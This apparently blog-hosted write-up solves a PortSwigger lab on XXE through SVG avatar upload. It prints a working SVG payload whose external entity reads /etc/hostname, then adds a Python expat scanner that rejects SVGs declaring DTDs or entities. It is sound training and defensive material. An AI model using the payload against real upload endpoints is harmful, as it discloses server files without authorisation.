Lab: Exploiting XXE via image file upload
Lab Scenario: Our mission is to exploit XXE through an image file upload on a web application. By uploading a crafted SVG image, we intend to reveal the contents of a server file, in this case /etc/hostname. Let's proceed with the solution:
Crafting the Malicious SVG Image:
- Create a local SVG image with the following content (an external entity named xxe pointing at file:///etc/hostname, referenced from a text element so its value is rendered into the image):

    <?xml version="1.0" standalone="yes"?>
    <!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/hostname" > ]>
    <svg width="128px" height="128px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1">
      <text font-size="16" x="0" y="16">&xxe;</text>
    </svg>
Posting a Comment with Image Upload:
- Post a comment on a blog post.
- Upload the crafted SVG image as an avatar.
Exploiting XXE:
- When you view your comment, the XXE payload in the SVG image will trigger, disclosing the contents of the /etc/hostname file.
Submitting the Solution:
- Use the "Submit solution" button to submit the value of the server hostname obtained from the XXE exploitation.
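The lab works because the avatar processor parses the uploaded SVG with a parser that honours DOCTYPE entity declarations and resolves external entities. The following is an added example, not code from the lab or from PortSwigger, showing the check a defender would run on every uploaded SVG before it is parsed or rendered: it walks the file with Python's standard-library expat bindings, never fetches anything, and records any DOCTYPE, entity declaration or external entity reference so the upload can be rejected. The two sample files (the payload from this post and a benign avatar) are constructed inline; the function names scan_svg and is_safe_svg are this example's own.

```python
import xml.parsers.expat
from typing import List, Optional, Tuple

# Constructed sample inputs: the lab payload from this post, and a benign avatar.
MALICIOUS_SVG = b"""<?xml version="1.0" standalone="yes"?>
<!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/hostname" > ]>
<svg width="128px" height="128px" xmlns="http://www.w3.org/2000/svg" version="1.1">
  <text font-size="16" x="0" y="16">&xxe;</text>
</svg>"""

BENIGN_SVG = b"""<?xml version="1.0"?>
<svg width="128px" height="128px" xmlns="http://www.w3.org/2000/svg" version="1.1">
  <circle cx="64" cy="64" r="40"/>
</svg>"""


def scan_svg(data: bytes) -> Tuple[Optional[str], List[str]]:
    """Return (root element name, findings). Any finding means the upload is unsafe.

    The scan only observes what the document declares; no URI is ever fetched,
    because the external-entity handler records the reference and returns
    without creating a sub-parser, so expat treats the entity as empty.
    """
    findings: List[str] = []
    root: List[str] = []
    parser = xml.parsers.expat.ParserCreate()
    # Never read external parameter entities / external DTD subsets. This is
    # expat's default, but stating it keeps the intent explicit.
    parser.SetParamEntityParsing(xml.parsers.expat.XML_PARAM_ENTITY_PARSING_NEVER)

    def on_doctype(name, sysid, pubid, has_internal_subset):
        # A raster/vector avatar has no business carrying a DTD at all.
        findings.append(f"DOCTYPE declaration for {name!r}")

    def on_entity_decl(name, is_param, value, base, sysid, pubid, notation):
        kind = "external" if (sysid or pubid) else "internal"
        target = sysid or pubid or value
        findings.append(f"{kind} entity {name!r} -> {target!r}")

    def on_external_ref(context, base, sysid, pubid):
        # Called when content references a declared external entity (&xxe;).
        findings.append(f"external entity reference to {sysid!r}")
        return 1  # "handled": nothing is fetched, entity expands to nothing

    def on_start(name, attrs):
        if not root:
            root.append(name)

    parser.StartDoctypeDeclHandler = on_doctype
    parser.EntityDeclHandler = on_entity_decl
    parser.ExternalEntityRefHandler = on_external_ref
    parser.StartElementHandler = on_start
    try:
        parser.Parse(data, True)
    except xml.parsers.expat.ExpatError as exc:
        findings.append(f"malformed XML: {exc}")
    return (root[0] if root else None), findings


def is_safe_svg(data: bytes) -> bool:
    """Accept only well-formed documents rooted at <svg> with no DTD machinery."""
    root, findings = scan_svg(data)
    return root == "svg" and not findings


if __name__ == "__main__":
    for label, sample in (("malicious", MALICIOUS_SVG), ("benign", BENIGN_SVG)):
        root, findings = scan_svg(sample)
        print(f"{label}: root={root!r} safe={is_safe_svg(sample)}")
        for f in findings:
            print("  -", f)
```

Run as a script, the malicious sample is reported with three findings (the DOCTYPE, the external entity declaration for xxe, and the reference to file:///etc/hostname) while the benign avatar passes. In a real upload handler the same rule applies regardless of which library renders the image afterwards: reject any SVG that declares a DOCTYPE or entities, and configure the rendering parser itself to disable DTD processing so the upload check is not the only line of defence.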
Conclusion: This lab exercise provides practical insights into exploiting XXE vulnerabilities through image file uploads. By following this step-by-step guide, users can deepen their understanding of XXE attacks and the potential risks associated with improper handling of XML input. Stay informed, keep learning, and continue exploring the dynamic field of cybersecurity to contribute to a more secure online environment.
Reference:
- https://portswigger.net/web-security/xxe
- https://portswigger.net/web-security/xxe/lab-xxe-via-file-upload
Written by Joel O.